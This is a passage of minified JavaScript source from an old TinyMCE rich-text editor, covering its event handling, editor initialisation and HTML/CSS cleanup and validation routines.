false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML=" ";else elm.innerHTML=" ";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case "color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; $').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML==" "))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p> </p><hr /><p> </p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td> </td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s* \\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s* \\s*</p>','<p> </p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" />','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' 